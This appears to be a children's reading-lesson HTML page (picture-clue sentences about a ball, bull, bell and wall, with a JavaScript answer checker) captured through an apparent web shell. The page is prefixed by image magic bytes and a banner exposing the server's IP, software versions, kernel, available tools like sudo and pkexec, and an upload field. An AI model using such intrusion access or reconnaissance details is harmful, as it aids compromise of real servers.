????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.226.169.66 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelD/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>Read and write the following sentences with picture clues</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> var correctAnswers = 0; function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No1); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No1, 33), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_headings = ['id_td_heading1']; var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10']; shared_adjust_fontSize_for_ids_all_devices(ids_headings, 80); shared_adjust_fontSize_for_ids_all_devices(ids_texts, 100); } function page_onLoad() { } function btnHome_click() { shared_btnHomeCategories_click('LevelD'); } function btnPrevious_click() { window.location = "LevelDCat1Lesson32.html"; } function btnNext_click() { window.location = "LevelDCat1Lesson34.html"; } function validateSentence(id_inputAnswer) { var isSentenceWrong = true; var enteredText = document.getElementById(id_inputAnswer).value; var splitText = enteredText.split(" "); var trimmedText = ''; for (var textIndex = 0; textIndex < splitText.length; textIndex++) { if (splitText[textIndex].trim() != '') { trimmedText += splitText[textIndex].trim() + ' '; } } trimmedText = trimmedText.trim(); trimmedText = trimmedText.toLowerCase(); if (id_inputAnswer == 'id_td_text3') { if (trimmedText == "we can play with ball and the doll") { isSentenceWrong = false; if (correctAnswers < 4) { correctAnswers = correctAnswers + 1; } } } else if(id_inputAnswer == 'id_td_text6') { if (trimmedText == "the bull ran to the grass") { isSentenceWrong = false; if (correctAnswers < 4) { correctAnswers = correctAnswers + 1; } } } else if(id_inputAnswer == 'id_td_text8') { if (trimmedText == "it is a brass bell") { isSentenceWrong = false; if (correctAnswers < 4) { correctAnswers = correctAnswers + 1; } } } else if(id_inputAnswer == 'id_td_text10') { if (trimmedText == "do not tell all that i fell from a tall wall") { isSentenceWrong = false; if (correctAnswers < 4) { correctAnswers = correctAnswers + 1; } } } if ((correctAnswers == 4) && !(isSentenceWrong)) { shared_show_claps_animation('shared_id_div_claps_image'); } } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="2%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr> <td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent" style="border-bottom: none"><u>Read and write the following sentences with picture clues:</u> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="100%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr height="100%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td id="id_td_text1" width = "35%" class="shared_style_blue_24px_padding_left_2_percent">We can play with</td> <td width = "10%"> <img id="id_imgBall" width="70%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/ball.png" alt=""/> </td> <td id="id_td_text2" width = "20%" class="shared_style_blue_24px_padding_left_2_percent">and the</td> <td width = "10%"> <img id="id_imgDoll" width="70%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/doll.png" alt=""/> </td> <td width = "*"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td width = "*" class="style_text" style=" padding-left: 2%"> <input id="id_td_text3" type="text" class="shared_style_options_red" style="text-align:center; width: 80%" onchange="validateSentence('id_td_text3')"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td id="id_td_text4" width = "10%" class="shared_style_blue_24px_padding_left_2_percent">The</td> <td width = "10%"> <img id="id_imgBull" width="100%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/bull.png" alt=""/> </td> <td id="id_td_text5" width = "20%" class="shared_style_blue_24px_padding_left_2_percent">ran to the</td> <td width = "10%"> <img id="id_imgGoll" width="70%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/grass.png" alt=""/> </td> <td width = "*"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td width = "*" class="style_text" style=" padding-left: 2%"> <input id="id_td_text6" type="text" class="shared_style_options_red" style="text-align:center; width: 80%" onchange="validateSentence('id_td_text6')"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td id="id_td_text7" width = "20%" class="shared_style_blue_24px_padding_left_2_percent">It is a</td> <td width = "12%"> <img id="id_imgBrassBell" width="90%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/brassBell.png" alt=""/> </td> <td width = "*"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td width = "*" class="style_text" style=" padding-left: 2%"> <input id="id_td_text8" type="text" class="shared_style_options_red" style="text-align:center; width: 80%" onchange="validateSentence('id_td_text8')"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td id="id_td_text9" width = "70%" class="shared_style_blue_24px_padding_left_2_percent">Do not <span style="color: red">tell all</span> that I <span style="color: red">fell</span> from a <span style="color: red">tall</span></td> <td width = "10%"> <img id="id_imgWall" width="70%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/wall.png" alt=""/> </td> <td width = "*"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "10%"> </td> <td width = "*" class="style_text" style=" padding-left: 2%"> <input id="id_td_text10" type="text" class="shared_style_options_red" style="text-align:center; width: 80%" onchange="validateSentence('id_td_text10')"> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); </script> </body> </html>